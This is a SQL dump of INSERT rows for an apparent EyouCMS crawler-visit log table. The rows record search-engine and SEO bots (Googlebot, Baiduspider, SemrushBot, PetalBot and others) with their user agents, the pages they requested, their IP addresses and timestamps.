INSERT INTO `ey_weapp_spider_visit` VALUES ('94610', '99', 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/68.0.3440.75 safari/537.36 (compatible; smtbot/1.0; http://www.similartech.com/smtbot)', '/', '89.33.117.239', '1660370984', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94608', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/71.html', '66.249.79.110', '1660370667', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94702', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/371.html', '185.191.171.10', '1660420215', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94854', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/25_12.html', '185.191.171.38', '1660505769', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94839', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/151.html', '114.119.151.153', '1660496023', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94833', '99', 'mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)', '/news/102.html', '103.131.71.140', '1660490749', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94834', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_15/', '185.191.171.40', '1660490919', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94826', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/197.html', '114.119.151.155', '1660487069', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94825', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/162.html', '185.191.171.9', '1660486728', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94824', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/hangyexinwen/list_18_24/', '114.119.151.155', '1660485589', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94822', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/9_20.html', '220.181.108.147', '1660483810', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94821', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/5_2.html', '220.181.108.165', '1660483809', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94620', '4', 'mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/50.0.2661.102 safari/537.36; 360spider', '/', '42.236.10.105', '1660382374', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95095', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/421.html', '185.191.171.5', '1660620963', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94619', '4', 'mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/50.0.2661.102 safari/537.36; 360spider', '/', '42.236.10.108', '1660382071', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94613', '99', 'mozilla/5.0 (compatible; neevabot/1.0; +https://neeva.com/neevabot)', '/jiaruwomen/', '100.26.127.17', '1660375236', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95087', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/445.html', '207.46.13.52', '1660617555', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94444', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bcxw/list_19_5/', '185.191.171.39', '1660277738', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94434', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/59.html', '66.249.79.112', '1660275210', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94438', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/148.html', '66.249.79.110', '1660276013', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94430', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/171.html', '185.191.171.16', '1660272555', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94433', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/8_3.html', '185.191.171.8', '1660275052', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94428', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1660271771', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94855', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/61.html', '114.119.151.153', '1660506174', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94863', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/case/60.html', '216.244.66.194', '1660509026', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94857', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_26/', '185.191.171.21', '1660506835', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94860', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/guigang.html', '114.119.151.155', '1660508392', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94858', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/347.html', '185.191.171.15', '1660507408', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94859', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/huhehaote.html', '114.119.151.155', '1660508256', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94861', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/452.html', '216.244.66.194', '1660508431', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94862', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_46/', '185.191.171.40', '1660508669', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94865', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '36.234.108.96', '1660510458', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94868', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/lianyungang.html', '114.119.151.153', '1660510829', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94416', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/146.html', '220.181.108.167', '1660265637', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94420', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/213.html', '185.191.171.5', '1660268521', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94425', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_14/', '185.191.171.8', '1660270718', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94412', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/96.html', '216.244.66.194', '1660263548', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94411', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_58/', '216.244.66.194', '1660263062', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94408', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/331.html', '185.191.171.21', '1660262336', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94409', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/244.html', '185.191.171.43', '1660262935', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94414', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/195.html', '207.46.13.179', '1660264137', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94405', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/183.html', '185.191.171.9', '1660261937', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94879', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '111.249.155.193', '1660517165', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94402', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/442.html', '185.191.171.4', '1660260564', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94359', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.20.135', '1660224294', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94361', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/360.html', '185.191.171.44', '1660225021', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94344', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bljxw/list_18_25/', '116.179.32.20', '1660216304', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94336', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1660209381', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94334', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/list_3_24/', '116.179.32.102', '1660209059', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94351', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/98_8.html', '185.191.171.7', '1660219884', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94329', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/59.html', '114.119.151.153', '1660207891', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94322', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_3/', '185.191.171.10', '1660204923', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94357', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/list_3_20/', '116.179.32.167', '1660221914', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94323', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/454.html', '185.191.171.13', '1660204929', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94324', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/426.html', '40.77.167.13', '1660204936', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94320', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/fcgs.html', '114.119.151.155', '1660203722', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94315', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/44_5.html', '116.179.32.66', '1660200056', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94300', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/448.html', '216.244.66.194', '1660187532', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94316', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/157.html', '220.181.108.157', '1660200058', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94325', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/1_24.html', '116.179.32.175', '1660205784', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94298', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_53/', '185.191.171.14', '1660187159', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94299', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/301.html', '114.119.151.155', '1660187401', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94280', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/337.html', '114.119.151.153', '1660178024', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94285', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/290.html', '66.249.79.110', '1660180169', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94283', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1660178813', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94279', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/169.html', '185.191.171.17', '1660177850', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94290', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/98_6.html', '185.191.171.24', '1660184362', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94278', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/290.html', '66.249.79.112', '1660177469', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94286', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/98_7.html', '185.191.171.20', '1660180350', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94289', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/290.html', '66.249.79.112', '1660182870', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94281', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/102.html', '66.249.79.108', '1660178109', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94282', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/345.html', '114.119.151.153', '1660178556', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94287', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/271.html', '114.119.151.155', '1660180984', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94288', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/374.html', '114.119.151.153', '1660182002', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94268', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_24/', '185.191.171.44', '1660174375', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94266', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/', '66.249.79.108', '1660174117', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94267', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.20.122', '1660174179', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94269', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/362.html', '40.77.167.13', '1660175709', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94294', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/384.html', '185.191.171.12', '1660186340', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94265', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.20.122', '1660173983', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94263', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/216.html', '216.244.66.194', '1660173612', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94295', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/6_2.html', '185.191.171.10', '1660186550', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94297', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/162.html', '66.249.79.110', '1660187131', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94259', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/345.html', '66.249.79.110', '1660172145', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94308', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/368.html?admin_id=1', '185.191.171.7', '1660194079', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94309', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/contact/', '66.249.79.110', '1660194310', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94318', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '157.55.39.41', '1660201419', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94304', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/203.html', '66.249.79.108', '1660189830', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94321', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/63.html', '220.181.108.104', '1660204149', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94305', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/101.html', '66.249.79.110', '1660191591', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94319', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/168.html', '185.191.171.6', '1660202530', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94307', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.112', '1660192536', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94310', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/148_2.html', '185.191.171.12', '1660195779', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94317', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/160.html', '185.191.171.40', '1660200102', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94251', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/5.html?tagid=5', '185.191.171.8', '1660167533', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94335', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/wa.html', '114.119.151.155', '1660209217', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94337', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/59.html', '66.249.79.110', '1660209792', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94338', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/86.html', '185.191.171.35', '1660210092', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94340', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/hz.html', '114.119.151.153', '1660212191', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94341', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/84.html', '185.191.171.44', '1660212211', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94348', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/24_4.html', '116.179.32.200', '1660217708', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94376', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/155.html', '116.179.32.242', '1660241090', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94375', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1660240706', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94372', '4', 'mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/50.0.2661.102 safari/537.36; 360spider', '/', '180.163.220.60', '1660239628', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94369', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_10/', '185.191.171.38', '1660234953', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94368', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/373.html', '185.191.171.9', '1660234167', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94367', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/428.html', '185.191.171.7', '1660231324', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94354', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/25_7.html', '116.179.32.215', '1660220512', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94349', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '220.181.108.167', '1660219110', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94350', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/171.html', '185.191.171.5', '1660219824', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94247', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/4_2.html', '185.191.171.42', '1660165951', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94245', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/372.html', '66.249.79.110', '1660165070', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94237', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/40.html', '185.191.171.11', '1660161449', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94238', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1660161790', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94241', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_19.html', '185.191.171.44', '1660162085', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94234', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/59.html', '116.179.32.158', '1660156707', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94380', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/4_19.html', '185.191.171.25', '1660242259', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94231', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.108', '1660154118', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94227', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/16.html', '216.244.66.194', '1660153044', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94391', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/2_2.html', '116.179.32.215', '1660255818', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94390', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_3/', '185.191.171.2', '1660252120', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94216', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/73.html', '66.249.79.108', '1660149605', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94396', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/249.html', '185.191.171.23', '1660257811', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94397', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_36/', '185.191.171.23', '1660259565', '0');
